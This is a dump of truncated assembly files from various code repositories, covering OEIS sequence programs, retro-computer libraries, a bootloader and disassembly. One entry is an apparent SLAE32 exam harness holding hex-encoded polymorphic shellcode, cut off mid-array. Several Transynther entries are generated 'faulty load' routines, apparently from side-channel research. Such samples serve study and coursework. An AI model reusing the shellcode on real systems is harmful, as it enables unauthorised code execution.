; A031376: a(n) = prime(10*n - 1). ; 23,67,109,167,227,277,347,401,461,523,599,653,727,797,859,937,1009,1063,1129,1217,1289,1367,1447,1499,1579,1637,1723,1801,1879,1979,2039,2113,2207,2281,2351,2417,2521,2609,2683,2731,2803,2897,2971,3067,3169,3253,3329,3407,3499,3559,3637,3719,3803,3889,3967,4051,4133,4229,4289,4397,4...
Transynther/x86/_processed/NC/_zr_/i7-8650U_0xd2.log_1_1448.asm
ljhsiun2/medusa
9
209795
.global s_prepare_buffers s_prepare_buffers: push %r12 push %r14 push %r15 push %rbp push %rcx push %rdx lea addresses_D_ht+0x2554, %r15 clflush (%r15) nop nop sub $6214, %rbp movb (%r15), %r14b nop nop nop nop nop cmp %rdx, %rdx lea addresses_D_ht+0xfa9, %r12 sub %r15, %r15 mov $0x6162636465666768, %rcx movq %rcx, %xm...
libsrc/_DEVELOPMENT/math/float/math48/z80/am48_dsigdig.asm
meesokim/z88dk
0
209796
<gh_stars>0 SECTION code_fp_math48 PUBLIC am48_dsigdig am48_dsigdig: ; exit : b = number of significant hex digits in double representation ; c = number of significant decimal digits in double representation ; ; uses : bc ld bc,$0a0b ret
testCode/assemblyTest/simpleTest_6.asm
Dynamitelaw/scratchComputer
0
209797
###### # This code tests load and store instructions # If test passes, a0 register should store 42 ###### .text begin: #Store values into a0,a1 addi a0, zero, 21 # a0 = 21 addi a1, zero, 2 # a1 = 2 #Set stack pointer to starting value addi sp, zero, 256 addi t4, zero, 4 mul sp, sp, t4 #Allocate 8 bytes for the 2 in...
oeis/087/A087431.asm
neoneye/loda-programs
11
209798
<filename>oeis/087/A087431.asm<gh_stars>10-100 ; A087431: a(n) = 0^n/2 + 2^n*(n^2+n+2)/4. ; Submitted by <NAME>(s3) ; 1,2,8,28,88,256,704,1856,4736,11776,28672,68608,161792,376832,868352,1982464,4489216,10092544,22544384,50069504,110624768,243269632,532676608,1161822208,2524971008,5469372416,11811160064,25434259456 mo...
data/mapHeaders/TradeCenter.asm
AmateurPanda92/pokemon-rby-dx
9
209799
<reponame>AmateurPanda92/pokemon-rby-dx TradeCenter_h: db CLUB ; tileset db TRADE_CENTER_HEIGHT, TRADE_CENTER_WIDTH ; dimensions (y, x) dw TradeCenter_Blocks ; blocks dw TradeCenter_TextPointers ; texts dw TradeCenter_Script ; scripts db 0 ; connections dw TradeCenter_Object ; objects
slae32/assignment/6/part/3/test_polymorphic_shellcode.nasm
rbctee/SlaeExam
0
209800
<filename>slae32/assignment/6/part/3/test_polymorphic_shellcode.nasm<gh_stars>0 #include <stdio.h> #include <string.h> unsigned char code[] = \ "\x31\xdb\xf7\xe3\x52\x66\xbf\x2d\x46\x66\x57\x89\xe7\x52\xbe\x74\x63\x62\x72\x52\x68\x62\x6c\x65\x73\x68\x1d\x13\x16\x13\x31\x34\x24\x68\x62\x69\x6e\x2f\x68\x5b\x4c\x4d\x01\x...
Appl/FileMgrs2/CommonDesktop/CMain/cmainOpenClose.asm
steakknife/pcgeos
504
209801
<reponame>steakknife/pcgeos COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Copyright (c) GeoWorks 1992 -- All Rights Reserved PROJECT: PC GEOS MODULE: FILE: cmainOpenClose.asm AUTHOR: <NAME> ROUTINES: Name Description ---- ----------- REVISION HISTORY: Name Date ...
Examples/PRNG.asm
Pyxxil/rust-lc3-as
3
209804
.ORIG 0x3000 BR main XOR_BITMAP: .FILL 0b1000000000000000 .FILL 0b0100000000000000 .FILL 0b0010000000000000 .FILL 0b0001000000000000 .FILL 0b0000100000000000 .FILL 0b0000010000000000 .FILL 0b0000001000000000 .FILL 0b0000000100000000 .FILL 0b0000000010000000 .FILL 0b00000000...
oeis/327/A327474.asm
neoneye/loda-programs
11
209806
<reponame>neoneye/loda-programs<gh_stars>10-100 ; A327474: Number of distinct means of subsets of {1..n}, where {} has mean 0. ; 1,2,4,6,10,16,26,38,56,78,106,138,180,226,284,348,420,500,596,698,818,946,1086,1236,1408,1588,1788,2000,2230,2472,2742,3020,3328,3652,3996,4356,4740,5136,5568,6018,6492,6982,7512,8054,8638,92...
libsrc/spectrum/zx_model.asm
dex4er/deb-z88dk
1
209807
<filename>libsrc/spectrum/zx_model.asm ; ; ZX Spectrum specific routines ; by <NAME>, 22/09/2006 ; ; int zx_model(); ; ; The result is: ; - 0 unknown ; - 1 if the spectrum is a 48K ; - 2 if we have a Spectrum 128K or +2 ; - 3 if it is a Spectrum +2A or Pentagon ; - 4 if it is a Spectrum +3 ; - 5 if it is a ...
programs/oeis/044/A044242.asm
karttu/loda
1
209808
<filename>programs/oeis/044/A044242.asm ; A044242: Numbers n such that string 6,7 occurs in the base 8 representation of n but not of n-1. ; 55,119,183,247,311,375,439,503,567,631,695,759,823,887,951,1015,1079,1143,1207,1271,1335,1399,1463,1527,1591,1655,1719,1783,1847,1911,1975,2039,2103,2167,2231,2295,2359,2423,2487,...
src/00/display.asm
unlimitedbacon/kernel
0
209810
<filename>src/00/display.asm #ifndef COLOR initDisplay: ; Initialize LCD ld a, 1 + LCD_CMD_AUTOINCDEC_SETX call lcdDelay out (PORT_LCD_CMD), a ; X-Increment Mode ld a, 1 + LCD_CMD_SETOUTPUTMODE call lcdDelay out (PORT_LCD_CMD), a ; 8-bit mode ld a, 1 + LCD_CMD_SETDISPLAY call lcdDe...
programs/oeis/164/A164607.asm
neoneye/loda
22
209811
; A164607: a(n) = 4*a(n-1) + 4*a(n-2) for n > 1; a(0) = 1, a(1) = 10. ; 1,10,44,216,1040,5024,24256,117120,565504,2730496,13184000,63657984,307367936,1484103680,7165886464,34599960576,167063388160,806653394944,3894867132416,18806082109440,90803796967424,438439516307456,2116973253099520,10221651077627904,493544973229096...
bootloader/bootloader.asm
Chal13W1zz/Nairobi-OS
2
209812
; Nairobi OS bootloader V1 org 0x7c00 bits 16 start: jmp boot ; Defining variables and constants msg db "Welcome to Nairobi OS!", 0ah, 0dh, 0h boot: cli ; no interrupts cld ; all that is needed to init mov ax, 0x50 ; set the buffer mov es, ax xor bx, bx mov al, 2 ; read 2 sectors mov c...
cat.asm
tphan022/CS153assn2_p1
0
209814
_cat: file format elf32-i386 Disassembly of section .text: 00000000 <cat>: char buf[512]; void cat(int fd) { 0: 55 push %ebp 1: 89 e5 mov %esp,%ebp 3: 83 ec 28 sub $0x28,%esp int n; while((n = read(fd, buf, sizeof(buf))) > 0) 6: eb 1b ...
oeis/053/A053518.asm
neoneye/loda-programs
11
209815
<filename>oeis/053/A053518.asm<gh_stars>10-100 ; A053518: Numerators of successive convergents to continued fraction 1+2/(3+3/(4+4/(5+5/(6+6/(7+7/(8+8/(9+9/10+...))))))). ; Submitted by <NAME> ; 1,5,23,45,925,7285,7195,641075,6993545,27779915,1077005935,15001154095,6788401045,3570274674605,60484653310955,40198648188145...
Transynther/x86/_processed/AVXALIGN/_zr_/i9-9900K_12_0xa0.log_21829_634.asm
ljhsiun2/medusa
9
209816
<reponame>ljhsiun2/medusa<filename>Transynther/x86/_processed/AVXALIGN/_zr_/i9-9900K_12_0xa0.log_21829_634.asm .global s_prepare_buffers s_prepare_buffers: ret .global s_faulty_load s_faulty_load: push %r10 push %r13 push %r14 push %r15 push %rbp push %rcx push %rdi // Store lea addresses_UC+0x1022c, %rdi nop nop...
Keyboard_Master/Sources/main.asm
Mammothskier/EELE465
0
209817
;Main.s by <NAME>, <NAME> ;1/30/19 ;MASTER INCLUDE 'derivative.inc' XDEF _Startup, main, _Viic, _vKeyboard XREF __SEG_END_SSTACK ; symbol defined by the linker for the end of the stack ORG $0060 IIC_addr: DS.B 1 ;TRACK IIC ADDRESS msgLength: DS.B 1 ; TRACK TOTAL MESSAGE LENGTH current: DS.B 1 ; TR...
dino/lcs/item/2E.asm
zengfr/arcade_game_romhacking_sourcecode_top_secret_data
6
209819
<reponame>zengfr/arcade_game_romhacking_sourcecode_top_secret_data copyright zengfr site:http://github.com/zengfr/romhack 00042A move.l D1, (A0)+ 00042C dbra D0, $42a 001248 move.l D2, ($2c,A6) 00124C tst.w D0 [enemy+2C, enemy+2E, etc+2C, etc+2E, item+2C, item+2E] 001298 move.l D2, ($2c,A6) 00129C tst...
cmd/mem/lines.asm
minblock/msdos
0
209820
;/* ; * Microsoft Confidential ; * Copyright (C) Microsoft Corporation 1988 - 1991 ; * All Rights Reserved. ; */ ; ; Check the mode of the console, and return the number of lines available. ; This function is used in MEM's /P command, to determine the numbe...
libsrc/psg/wyz/ay_wyz_stop_effect.asm
jsmolina/z88dk
0
209821
IF !__CPU_INTEL__ & !__CPU_GBZ80__ SECTION code_psg PUBLIC ay_wyz_stop_effect PUBLIC _ay_wyz_stop_effect EXTERN asm_wyz_stop_effect ;void ay_wyz_stop_effect(void) ay_wyz_stop_effect: _ay_wyz_stop_effect: call asm_wyz_stop_effect ret ENDIF
oeis/204/A204512.asm
neoneye/loda-programs
11
209822
; A204512: Square roots of [A055872/8]: Their square written in base 8, with some digit appended, is again a square. ; Submitted by <NAME> ; 0,0,0,1,2,6,12,35,70,204,408,1189,2378,6930,13860,40391,80782,235416,470832,1372105,2744210,7997214,15994428,46611179,93222358,271669860,543339720,1583407981,3166815962,9228778026...
ee/hxt/adit.asm
olifink/smsqe
0
209823
; Add item V2.00  1990 <NAME> QJUMP section exten xdef hxt_adit xref hk_newst xref gu_hkuse xref gu_hkfre include 'dev8_ee_hk_data' ;+++ ; Add item ; ; d1 cs HOTKEY (word) ; a0 c p pointer to item ; a1 s ; a3 s ;...
31_Scrolling_Backgrounds/Dot.asm
DebugBSD/SDLExamples
3
209824
include Dot.inc Dot_shiftColliders proto :PTR Dot .code Dot_Init proc pDot:PTR Dot, x:DWORD, y:DWORD ; Constructor mov r10d, x mov r11d, y mov rdi, pDot mov (Dot PTR [rdi]).m_PosX, r10d mov (Dot PTR [rdi]).m_PosY, r11d mov (Dot PTR [rdi]).m_VelX, 0 mov (Dot PTR [rdi]).m_VelY, 0 ret Dot_Init endp Dot_...
Vivid/libv/linux_x64/memory.asm
lehtojo/v
3
209825
#analyze .intel_syntax noprefix # xmm0: Value .global _V15decimal_to_bitsd_rx _V15decimal_to_bitsd_rx: movq rax, xmm0 ret # rdi: Value .global _V15bits_to_decimalx_rd _V15bits_to_decimalx_rd: movq xmm0, rdi ret # rcx: Nanoseconds .global _V5sleepx _V5sleepx: # Nanoseconds / 1 000 000 000 = Seconds mov rax, rdi mov ...
qemu/pc-bios/optionrom/linuxboot.asm
theloadstar/6.828
0
209826
<filename>qemu/pc-bios/optionrom/linuxboot.asm<gh_stars>0 # 1 "linuxboot.S" # 1 "<built-in>" # 1 "<command-line>" # 31 "<command-line>" # 1 "/usr/include/stdc-predef.h" 1 3 4 # 32 "<command-line>" 2 # 1 "linuxboot.S" # 23 "linuxboot.S" # 1 "optionrom.h" 1 # 23 "optionrom.h" # 1 "../../include/hw/nvram/fw_cfg.h" 1 # 24 ...
programs/oeis/212/A212161.asm
neoneye/loda
22
209827
; A212161: Numbers 6 or 10 modulo 17. ; 6,10,23,27,40,44,57,61,74,78,91,95,108,112,125,129,142,146,159,163,176,180,193,197,210,214,227,231,244,248,261,265,278,282,295,299,312,316,329,333,346,350,363,367,380,384,397,401,414,418,431,435,448,452,465,469,482,486,499,503,516,520,533,537,550,554,567,571,584,588,601,605,618,6...